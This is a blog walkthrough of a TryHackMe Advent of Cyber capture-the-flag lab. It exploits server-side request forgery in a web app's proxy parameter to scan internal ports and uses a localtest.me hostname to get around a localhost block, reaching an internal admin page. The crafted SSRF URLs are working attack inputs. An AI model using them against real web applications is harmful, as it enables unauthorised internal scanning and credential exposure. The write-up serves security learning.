TryHackMe — Advent of Cyber 2 -Day 19

Good evening everyone,

Today we will be tackling the Day 19 machine, which is based on LFI and SSRF. Anyway, the intro for today:

“Santa has released a web app that lets the children of the world check whether they are currently on the naughty or nice list. Unfortunately, the elf who coded it exposed more things than she thought. Can you access the list administration and ensure that every child gets a present from Santa this year?

Feel free to try hacking this web app on your own, or follow the instructions below! Note: when bypassing the hostname filter, use localtest.me otherwise your attempts won’t work!”

Now, I won’t kid you, I did read through the notes for today to get an idea of what we are dealing with. It does give us information that there is an http server on the machine so for now I’ll avoid the nmap and dive right into that.

Alrighty so our first Question: What is Santa’s password?

Upon entry into the website, we encounter this form, along with an admin login below it.

The interesting bit is the URL: http://10.10.69.159/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3D3lduderino …. also I’m not on the nice list, that is sad. Did a quick scan through the source code, didn’t seem to have anything of interest.

Did a quick URL decode on Burp and got this: http://10.10.69.159/?proxy=http://list.hohoho:8080/search.php?name=3lduderino

We scan strip everything past the port number to see if there is a root site and build a custom script to see if there is any other directories. We know what we are looking for in a failure site (in this case, the root site).

But for now, let’s move on and see if there is another way we can use.

So, it looks like we local server with port 8080 open, we can try and play with the port number to see what we can get. We can use this to do rudimentary port scanning.

But it looks like right away we get a hit on port 22 and it is open on the remote server.

Tried to get the passwd file but seems they are parsing out the URL.

If we try and check to see if there is a local only server running, we get blocked (by their security team).

http://10.10.69.159/?proxy=http%3A%2F%2Flocalhost

Let’s go back to the port thing and see if we can check if there is local only services running on the server.

http://10.10.69.159/?proxy=http%3A%2F%2Flist.hohoho.localtest.me:22

We received the same error as above with the connection reset by peer. So this is good. We can see if there is ports only accessible to the localhost. Now we got a hit with port 80 with some goodies which answers Question 1.

http://10.10.69.159/?proxy=http%3A%2F%2Flist.hohoho.localtest.me:80

Be aware, the username is capital sensitive.

Once you delete the naughty list(or read the source-code), you will receive the flag for today’s challenge. As usual, I’ll leave that part up to you. That was a lot of googling for me today, hopefully yours went a little smoother.

As always, best of luck. If you enjoy my content, feel free to add me on LinkedIn and let me know you saw the blog.

Until next time,

-3lduderino